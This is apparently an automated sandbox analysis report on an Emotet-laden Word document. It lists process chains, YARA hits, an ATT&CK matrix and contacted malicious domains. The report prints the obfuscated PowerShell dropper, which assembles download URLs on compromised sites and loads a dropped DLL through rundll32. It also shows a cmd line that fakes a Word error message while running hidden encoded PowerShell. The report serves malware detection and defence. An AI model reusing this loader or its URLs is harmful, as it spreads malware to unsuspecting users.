                      Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2488 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: powershell.exe, 00000005.00000002.2086923820.0000000000373000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FF3278 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002327EC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_01FF3278 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C27EC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A27EC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005927EC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00403278 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001A27EC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00403278 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002027EC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_01FF27EC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001E27EC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_002E27EC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00363278 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_004827EC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 17_2_00373278 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 17_2_004327EC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_001B27EC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_001927EC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00273278 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_001C27EC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                      Source: C:\Windows\SysWOW64\rundll32.exe Memory protected: page write copy | page execute | page execute read | page execute and read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      Encrypted powershell cmdline option found
                      Source: unknownProcess created: Base64 decoded SeT-ITEM ('v'+'ARia'+'BlE:f'+'7D'+'H') ( [TYPe]("{2}{0}{4}{1}{3}"-F 'SteM.iO','cto','sy','ry','.dire')) ; sEt-ItEM VaRiABLe:Sg2xU ( [TyPe]("{7}{4}{5}{1}{8}{2}{0}{6}{3}"-F'AnAg','CEPoIn','M','R','TEm.Net.SEr','vI','E','SYs','t') ); $Zz82_42=$B03I + [char](33) + $K78S;$O00G=('E_'+'6Z'); $F7DH::"crEA`TEDI`R`ecTORy"($HOME + ((('egTL'+'xb'+'f')+'yv'+'k'+'eg'+'T'+'Gc'+('qt'+'r_f')+('eg'+'T'))."rePL`ACE"(([CHAR]101+[CHAR]103+[CHAR]84),[string][CHAR]92)));$P46U=('A'+('65'+'Q')); $SG2XU::"s`ECu`RiTYprOTo`c`Ol" = ('Tl'+('s1'+'2'));$I_7R=('D'+('75'+'G'));$Yzjqxxq = ('C4'+'6T');$L__S=(('P_'+'_')+'D');$Uk1tt1_=$HOME+(('H'+('Ox'+'Lxbf')+'y'+'v'+('kHOx'+'Gcq')+'t'+('r_f'+'HOx'))."rEpl`Ace"(('HO'+'x'),[stRINg][CHaR]92))+$Yzjqxxq+'.d' + 'll';$T55L=(('Y'+'21')+'Q');$Jg41scw='h' + 'tt' + 'p';$Niooi2q=(('n'+'s wu ')+('d'+'b ')+('nd'+':')+('//'+'ni')+'gh'+('t'+'lifemu'+'mb')+'a'+('i.'+'cl')+('ub/x'+'/0w'+'B')+('D3'+'/!n'+'s w')+'u '+'d'+'b'+(' nd'+'s')+':/'+('/'+'sho')+('p.no'+'w')+'f'+('al.d'+'e')+'v'+'/w'+('p-in'+'c')+('lu'+'de')+('s/R'+'lMO'+'bf')+('2j0'+'/!ns w'+'u')+(' '+'db '+'nd:/')+'/'+('e-'+'w'+'design')+'.'+('e'+'u/wp')+'-'+'c'+('o'+'nte')+('nt'+'/'+'bn1Ig'+'D'+'ejh/!ns ')+('wu'+' d'+'b nd')+':/'+'/'+'t'+('ra'+'umf')+'r'+'a'+('ue'+'n')+('-uk'+'r')+('ai'+'ne'+'.de')+'/b'+('in'+'/Jye')+('S/!'+'ns wu ')+('d'+'b ')+('n'+'ds:')+('//'+'jflm')+('kt'+'g.wpc')+'om'+('sta'+'gi'+'ng.'+'c'+'om/wp'+'-content')+('/AK'+'/')+('!ns'+' wu ')+('db '+'nd')+('s:'+'//lin')+'hk'+('i'+'en')+'m
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc [Base64-encoded command]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString
                      Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Itwxrtu\wpjaux.bsi',JnNGuImBTNGmQ
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Itwxrtu\wpjaux.bsi',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gesxrslxkhcnse\kfdzbsrddlvak.pye',cGgBEdar
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gesxrslxkhcnse\kfdzbsrddlvak.pye',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqecxzw\ccpuwn.kyt',VWMVjHoJWTwKe
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqecxzw\ccpuwn.kyt',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Swvcgiaelz\sxbljovgm.oha',GOGZBCfUK
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Swvcgiaelz\sxbljovgm.oha',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qxunlgclf\rrjtkhok.xfz',saFFaIU
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qxunlgclf\rrjtkhok.xfz',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uaceqxeeiarsm\ncdxfzylbgum.nhe',sKCf
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uaceqxeeiarsm\ncdxfzylbgum.nhe',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yorvuovvtuqtxoj\wcvkwfajnrxlso.qcf',HPKSdoSG
                      Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc [Base64-encoded command]
                      Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc [Base64-encoded command]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      Yara detected Emotet
                      Source: Yara matchFile source: 00000008.00000002.2090414213.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2111384488.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2098038416.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2106858683.0000000000360000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.3149905942.0000000000310000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2103316012.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.3149807295.0000000000270000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2095835293.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 17.2.rundll32.exe.370000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.410000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.310000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.5d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.370000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.4b0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.460000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.460000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.3a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1ff0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.4b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.1ff0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1ff0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.310000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.410000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.380000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.3a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.360000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.680000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.5d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.360000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.310000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.680000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.1ff0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.380000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.310000.1.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                      Valid Accounts | Windows Management Instrumentation 11 | Path Interception | Process Injection 11 | Masquerading 11 | OS Credential Dumping | Query Registry 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                      Default Accounts | Command and Scripting Interpreter 211 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion 2 | LSASS Memory | Security Software Discovery 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 4 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                      Domain Accounts | Scripting 12 | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools 11 | Security Account Manager | Virtualization/Sandbox Evasion 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                      Local Accounts | Exploitation for Client Execution 3 | Logon Script (Mac) | Logon Script (Mac) | Process Injection 11 | NTDS | Process Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 4 | SIM Card Swap | | Carrier Billing Fraud
                      Cloud Accounts | PowerShell 2 | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 31 | LSA Secrets | Remote System Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Scripting 12 | Cached Domain Credentials | File and Directory Discovery 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                      External Remote Services | Scheduled Task | Startup Items | Startup Items | Hidden Files and Directories 1 | DCSync | System Information Discovery 15 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Obfuscated Files or Information 2 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
                      Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Rundll32 1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

                      Behavior Graph

                      [Figure: behavior graph. Behavior Graph ID: 344134; Sample: N00048481397007.doc; Startdate: 26/01/2021; Architecture: WINDOWS; Score: 100.]
                      Top-level signatures: Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 11 other signatures.
                      Processes: cmd.exe (started) and WINWORD.EXE (started). cmd.exe carries the signatures "Suspicious powershell command line found", "Very long command line found" and "Encrypted powershell cmdline option found", and starts powershell.exe and msg.exe.
                      DNS/IP: powershell.exe contacts traumfrauen-ukraine.de (212.227.200.73, 443, 49168, 49169, ONEANDONE-ASBrauerstrasse48DE, Germany), e-wdesign.eu (45.138.97.75, 49167, 80, M247GB, Germany) and 3 other IPs or domains.
                      Dropped file: C:\Users\user\Lxbfyvkbehaviorgraphcqtr_f\C46T.dll, data (dropped by powershell.exe).
                      powershell.exe starts rundll32.exe, which starts a chain of further rundll32.exe processes; three of them carry the signature "Hides that the sample has been downloaded from the Internet (zone.identifier)".


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      Source | Detection | Scanner | Label | Link
                      N00048481397007.doc | 16% | Virustotal | | Browse
                      N00048481397007.doc | 9% | ReversingLabs | |

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      Source | Detection | Scanner | Label | Link | Download
                      17.2.rundll32.exe.370000.0.unpack | 100% | Avira | HEUR/AGEN.1110387 | | Download File
                      12.2.rundll32.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1110387 | | Download File
                      15.2.rundll32.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1110387 | | Download File
                      8.2.rundll32.exe.1ff0000.1.unpack | 100% | Avira | HEUR/AGEN.1110387 | | Download File
                      7.2.rundll32.exe.1ff0000.1.unpack | 100% | Avira | HEUR/AGEN.1110387 | | Download File
                      13.2.rundll32.exe.410000.1.unpack | 100% | Avira | HEUR/AGEN.1110387 | | Download File
                      11.2.rundll32.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1110387 | | Download File
                      9.2.rundll32.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1110387 | | Download File
                      16.2.rundll32.exe.360000.0.unpack | 100% | Avira | HEUR/AGEN.1110387 | | Download File
                      10.2.rundll32.exe.5d0000.0.unpack | 100% | Avira | HEUR/AGEN.1110387 | | Download File
                      14.2.rundll32.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1110387 | | Download File
                      18.2.rundll32.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1110387 | | Download File
                      19.2.rundll32.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1110387 | | Download File
                      20.2.rundll32.exe.270000.0.unpack | 100% | Avira | HEUR/AGEN.1110387 | | Download File

                      Domains

                      Source | Detection | Scanner | Label | Link
                      shop.nowfal.dev | 7% | Virustotal | | Browse
                      traumfrauen-ukraine.de | 5% | Virustotal | | Browse
                      e-wdesign.eu | 6% | Virustotal | | Browse
                      nightlifemumbai.club | 5% | Virustotal | | Browse

                      URLs


                      Domains and IPs

                      Contacted Domains

                      Name | IP | Active | Malicious | Antivirus Detection | Reputation
                      shop.nowfal.dev | 104.21.88.166 | true | true | | unknown
                      traumfrauen-ukraine.de | 212.227.200.73 | true | true | | unknown
                      e-wdesign.eu | 45.138.97.75 | true | true | | unknown
                      nightlifemumbai.club | 172.217.6.174 | true | true | | unknown
                      jflmktg.wpcomstaging.com | 192.0.78.20 | true | true | | unknown

                        Contacted URLs

                        Name | Malicious | Antivirus Detection | Reputation
                        http://nightlifemumbai.club/x/0wBD3/ | true | Avira URL Cloud: malware | unknown
                        http://traumfrauen-ukraine.de/bin/JyeS/ | true | Avira URL Cloud: safe | unknown
                        http://e-wdesign.eu/wp-content/bn1IgDejh/ | true | Avira URL Cloud: safe | unknown

                        URLs from Memory and Binaries

                        Name | Source | Malicious | Antivirus Detection | Reputation
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://traumfrauen-ukraine.depowershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmptrue
                          • Avira URL Cloud: safe
                          unknown
                          http://www.certplus.com/CRL/class2.crl0powershell.exe, 00000005.00000002.2096359937.000000001D337000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.disig.sk/ca/crl/ca_disig.crl0powershell.exe, 00000005.00000002.2093133348.000000001B612000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://ocsp.infonotary.com/responder.cgi0Vpowershell.exe, 00000005.00000003.2086210484.000000001D2F7000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.sk.ee/cps/0powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.globaltrust.info0=powershell.exe, 00000005.00000003.2086200041.000000001D303000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0Epowershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://servername/isapibackend.dllpowershell.exe, 00000005.00000002.2096618257.000000001D4B0000.00000002.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          http://www.valicert.1powershell.exe, 00000005.00000002.2095948799.000000001D2B4000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          http://www.ssc.lt/cps03powershell.exe, 00000005.00000002.2096173039.000000001D2EF000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          https://shop.nowfal.dev/wp-includes/RlMObf2j0/powershell.exe, 00000005.00000002.2091877463.0000000003A85000.00000004.00000001.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          http://ocsp.sectigo.com0/powershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.windows.com/pctv.rundll32.exe, 00000008.00000002.2091319126.0000000001C10000.00000002.00000001.sdmpfalse
                            high
                            http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#powershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://ocsp.pki.gva.es0powershell.exe, 00000005.00000003.2086200041.000000001D303000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://crl.oces.certifikat.dk/oces.crl0powershell.exe, 00000005.00000003.2086190391.000000001D2E4000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://crl.ssc.lt/root-b/cacrl.crl0powershell.exe, 00000005.00000003.2086200041.000000001D303000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.certicamara.com/dpc/0Zpowershell.exe, 00000005.00000003.2086210484.000000001D2F7000.00000004.00000001.sdmpfalse
                              high
